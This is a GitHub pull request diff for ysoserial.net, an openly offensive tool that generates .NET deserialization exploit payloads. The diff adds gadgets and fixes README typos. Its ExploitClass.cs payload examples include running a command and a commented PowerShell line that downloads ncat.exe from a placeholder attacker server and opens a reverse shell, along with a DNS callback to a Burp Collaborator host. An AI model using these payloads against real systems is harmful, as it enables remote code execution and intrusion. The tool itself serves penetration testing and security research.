Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Adding new gadgets & improvments #141

Merged
merged 1 commit into from
Nov 24, 2022
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
8 changes: 4 additions & 4 deletions ExploitClass/ExploitClass.cs
Original file line number Diff line number Diff line change
Expand Up @@ -8,11 +8,11 @@ public E()
/* Payload code to be executed. Examples: */


/* Showing a message box: -c "ExploitClass.cs;./dlls/System.Windows.Forms.dll" */
/* Showing a message box: -c "ExploitClass.cs;System.Windows.Forms.dll" */
System.Windows.Forms.MessageBox.Show("Pwned", "Pwned", System.Windows.Forms.MessageBoxButtons.OK, System.Windows.Forms.MessageBoxIcon.Error);


/* Creating a text file: -c "ExploitClass.cs;./dlls/System.dll" */
/* Creating a text file: -c "ExploitClass.cs;System.dll" */
/*
using (System.IO.StreamWriter outputFile = new System.IO.StreamWriter(@"C:\windows\temp\test.txt"))
{
Expand All @@ -21,11 +21,11 @@ public E()
//*/


/* Making a DNS request for PoC (System.dll needs to be in the dlls folder): -c "ExploitClass.cs;./dlls/System.dll" */
/* Making a DNS request for PoC (System.dll needs to be in the dlls folder): -c "ExploitClass.cs;System.dll" */
//System.Net.Dns.Resolve("8z89j28ubxz878iktsny9abwyn4ds2.burpcollaborator.net");


/* Running a command: -c "ExploitClass.cs;./dlls/System.dll" */
/* Running a command: -c "ExploitClass.cs;System.dll" */
//System.Diagnostics.Process.Start("cmd.exe", "/c calc");
//System.Diagnostics.Process.Start("powershell.exe", "-Command \"(New-Object Net.WebClient).DownloadFile(\\\"http://AttackerServer/ncat.exe\\\", \\\"c:\\windows\\temp\\ncat.exe\\\")\"");// & c:\\windows\\temp\\ncat.exe -nv AttackerServerIP 4444 -e powershell.exe");

Expand Down
69 changes: 52 additions & 17 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -58,31 +58,60 @@ ysoserial.net generates deserialization payloads for a variety of .NET formatter

(*) AxHostState
Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer , SoapFormatter
Labels: Bridge and dervied
Labels: Bridge and derived
Supported formatter for the bridge: BinaryFormatter
(*) ClaimsIdentity
Formatters: BinaryFormatter , LosFormatter , SoapFormatter
Labels: Bridge and dervied, OnDeserialized
Labels: Bridge and derived, OnDeserialized
Supported formatter for the bridge: BinaryFormatter
(*) ClaimsPrincipal
Formatters: BinaryFormatter , LosFormatter , SoapFormatter
Labels: Bridge and dervied, OnDeserialized, SecondOrderDeserialization
Labels: Bridge and derived, OnDeserialized, SecondOrderDeserialization
Supported formatter for the bridge: BinaryFormatter
(*) DataSet
Formatters: BinaryFormatter , LosFormatter , SoapFormatter
Labels: Bridge and dervied
Labels: Bridge and derived
Supported formatter for the bridge: BinaryFormatter
(*) DataSetTypeSpoof [A more advanced type spoofing which can use any arbtirary types can be seen in TestingArenaHome::SpoofByBinaryFormatterJson]
(*) DataSetOldBehaviour [This gadget targets and old behaviour of DataSet which uses XML format]
Formatters: BinaryFormatter , LosFormatter
Labels: Bridge and derived
Supported formatter for the bridge: LosFormatter
Extra options:
--spoofedAssembly=VALUE
The numerical internal gadget choice to use:
1=TypeConfuseDelegate,
2=TextFormattingRunProperties (default: 1
[TypeConfuseDelegate])

(*) DataSetOldBehaviourFromFile [Another variant of the DataSetOldBehaviour gadget. This gadget interprets the command parameter as path to the .cs file that should be compiled as exploit class. Use semicolon to separate the file from additionally required assemblies, e. g., '-c ExploitClass.cs;System.Windows.Forms.dll']
Formatters: BinaryFormatter , LosFormatter
Labels: Bridge and derived
Extra options:
-x=VALUE The numerical internal gadget choice to use:
1=TypeConfuseDelegate,
2=TextFormattingRunProperties (default: 1
[TypeConfuseDelegate])

(*) DataSetTypeSpoof [A more advanced type spoofing which can use any arbitrary types can be seen in TestingArenaHome::SpoofByBinaryFormatterJson or in the DataSetOldBehaviour gadget]
Formatters: BinaryFormatter , LosFormatter , SoapFormatter
Labels: Bridge and dervied
Labels: Bridge and derived
Supported formatter for the bridge: BinaryFormatter
(*) GenericPrincipal
Formatters: BinaryFormatter , LosFormatter
Labels: Bridge and derived, OnDeserialized, SecondOrderDeserialization
Supported formatter for the bridge: BinaryFormatter
Extra options:
--var, --variant=VALUE Payload variant number where applicable.
Choices: 1 (uses serialized ClaimsIdentities), 2
(uses serialized Claims)

(*) ObjectDataProvider
Formatters: DataContractSerializer (2) , FastJson , FsPickler , JavaScriptSerializer , Json.Net , SharpSerializerBinary , SharpSerializerXml , Xaml (4) , XmlSerializer (2) , YamlDotNet < 5.0.0
Labels: Not bridge or derived
Extra options:
--var, --variant=VALUE Payload variant number where applicable.
Choices: 1, 2, 3, ... based on formatter.
--xamlurl=VALUE This is to create a very short paylaod when
--xamlurl=VALUE This is to create a very short payload when
affected box can read the target XAML URL e.g.
"http://b8.ee/x" (can be a file path on a shared
drive or the local system). This is used by the
Expand All @@ -108,21 +137,21 @@ ysoserial.net generates deserialization payloads for a variety of .NET formatter

(*) RolePrincipal
Formatters: BinaryFormatter , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter
Labels: Bridge and dervied
Labels: Bridge and derived
Supported formatter for the bridge: BinaryFormatter
(*) SessionSecurityToken
Formatters: BinaryFormatter , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter
Labels: Bridge and dervied
Labels: Bridge and derived
Supported formatter for the bridge: BinaryFormatter
(*) SessionViewStateHistoryItem
Formatters: BinaryFormatter , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter
Labels: Bridge and dervied
Labels: Bridge and derived
Supported formatter for the bridge: LosFormatter
(*) TextFormattingRunProperties [This normally generates the shortest payload]
Formatters: BinaryFormatter , DataContractSerializer , LosFormatter , NetDataContractSerializer , SoapFormatter
Labels: Not bridge but derived
Extra options:
--xamlurl=VALUE This is to create a very short paylaod when
--xamlurl=VALUE This is to create a very short payload when
affected box can read the target XAML URL e.g.
"http://b8.ee/x" (can be a file path on a shared
drive or the local system). This is used by the
Expand All @@ -135,7 +164,7 @@ ysoserial.net generates deserialization payloads for a variety of .NET formatter

(*) ToolboxItemContainer
Formatters: BinaryFormatter , LosFormatter , SoapFormatter
Labels: Bridge and dervied
Labels: Bridge and derived
Supported formatter for the bridge: BinaryFormatter
(*) TypeConfuseDelegate
Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer
Expand All @@ -145,19 +174,19 @@ ysoserial.net generates deserialization payloads for a variety of .NET formatter
Labels: Not bridge or derived
(*) WindowsClaimsIdentity [Requires Microsoft.IdentityModel.Claims namespace (not default GAC)]
Formatters: BinaryFormatter (3) , DataContractSerializer (2) , Json.Net (2) , LosFormatter (3) , NetDataContractSerializer (3) , SoapFormatter (2)
Labels: Bridge and dervied, Not in GAC
Labels: Bridge and derived, Not in GAC
Supported formatter for the bridge: BinaryFormatter
Extra options:
--var, --variant=VALUE Payload variant number where applicable.
Choices: 1, 2, or 3 based on formatter.

(*) WindowsIdentity
Formatters: BinaryFormatter , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter
Labels: Bridge and dervied
Labels: Bridge and derived
Supported formatter for the bridge: BinaryFormatter
(*) WindowsPrincipal
Formatters: BinaryFormatter , DataContractJsonSerializer , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter
Labels: Bridge and dervied
Labels: Bridge and derived

== PLUGINS ==
(*) ActivatorUrl (Sends a generated payload to an activated, presumably remote, object)
Expand Down Expand Up @@ -353,7 +382,7 @@ Options:
formatters). Default: true
--raf, --runallformatters
Whether to run all the gadgets with the provided
formatter (ignores gagdet name, output format,
formatter (ignores gadget name, output format,
and the test flag arguments). This will search
in formatters and also show the displayed
payload length. Default: false
Expand Down Expand Up @@ -479,7 +508,7 @@ Special thanks to all contributors:
$ ./ysoserial.exe --credit

ysoserial.net has been originally developed by Alvaro Munoz (@pwntester)
this tool is being maintained by Alvaro Munoz (@pwntester) and Soroush Dalili (@irsdl)
this tool is being maintained by Soroush Dalili (@irsdl) and Alvaro Munoz (@pwntester)

Credits for available gadgets:
ActivitySurrogateDisableTypeCheck
Expand All @@ -496,8 +525,14 @@ Credits for available gadgets:
[Finders: jang]
DataSet
[Finders: James Forshaw] [Contributors: Soroush Dalili]
DataSetOldBehaviour
[Finders: Steven Seeley] [Contributors: Soroush Dalili]
DataSetOldBehaviourFromFile
[Finders: Steven Seeley, Markus Wulftange] [Contributors: Soroush Dalili]
DataSetTypeSpoof
[Finders: James Forshaw] [Contributors: Soroush Dalili, Markus Wulftange, Jang]
GenericPrincipal
[Finders: Soroush Dalili]
ObjectDataProvider
[Finders: Oleksandr Mirosh, Alvaro Munoz] [Contributors: Alvaro Munoz, Soroush Dalili, Dane Evans]
ObjRef
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -19,22 +19,7 @@ public PayloadClassFromFile(string file, int variant_number, InputArgs inputArgs
{
this.variant_number = variant_number;
this.inputArgs = inputArgs;
string[] files = file.Split(new[] { ';' }).Select(s => s.Trim()).ToArray();
CodeDomProvider codeDomProvider = CodeDomProvider.CreateProvider("CSharp");
CompilerParameters compilerParameters = new CompilerParameters();
compilerParameters.CompilerOptions = "-t:library -o+ -platform:anycpu";
compilerParameters.ReferencedAssemblies.AddRange(files.Skip(1).ToArray());
CompilerResults compilerResults = codeDomProvider.CompileAssemblyFromFile(compilerParameters, files[0]);
if (compilerResults.Errors.Count > 0)
{
foreach (CompilerError error in compilerResults.Errors)
{
Console.Error.WriteLine(error.ErrorText);
}
Environment.Exit(-1);
}
base.assemblyBytes = File.ReadAllBytes(compilerResults.PathToAssembly);
File.Delete(compilerResults.PathToAssembly);
base.assemblyBytes = LocalCodeCompiler.CompileToAsmBytes(file);
}
}

Expand Down
Loading